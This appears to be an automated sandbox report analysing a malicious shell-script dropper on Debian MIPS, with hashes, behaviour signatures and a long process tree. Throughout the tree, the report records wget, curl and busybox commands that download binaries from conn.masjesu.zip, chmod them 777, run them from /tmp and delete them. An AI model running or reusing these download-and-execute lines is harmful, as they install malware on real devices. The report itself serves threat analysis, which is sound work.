Analysis
-
max time kernel
115s -
max time network
118s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/11/2024, 08:31
Static task
static1
Behavioral task
behavioral1
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh
-
Size
10KB
-
MD5
adde5a6a03a737c7793c75dfe510b0fd
-
SHA1
a134f05a5c12be4898be3c500cc2c7bb8953af7a
-
SHA256
cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446
-
SHA512
f98bc88c3067df5a7c45af7fba52a32ad5238e8c34a21629a6f9f030faf527d0682ba152b2ab1a6034b9a5e72e45f11571ea11b9aa7c6a904fb79816e0ce6f01
-
SSDEEP
96:YDfWUrHHlznz7zYLeOpLddJFLSmPh04HoyKlC2mg0X1VQLqiq6qIFxhIEx59595m:Z2u9RFvxQLnnEtDmdnnEtDDMtK
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh/tmp/cd161caf49770301b410c299b83eb56c7227728bb37825a7cd55e7266a679446.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:732
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- System Network Configuration Discovery
PID:747
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:750
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:774
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:804
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:853
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:881
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:895
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:904
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns62⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:932
-
-
/bin/rmrm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM2⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵PID:944
-
-
/bin/chmodchmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:958
-
-
/bin/chmodchmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:972
-
-
/bin/chmodchmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- System Network Configuration Discovery
PID:1000
-
-
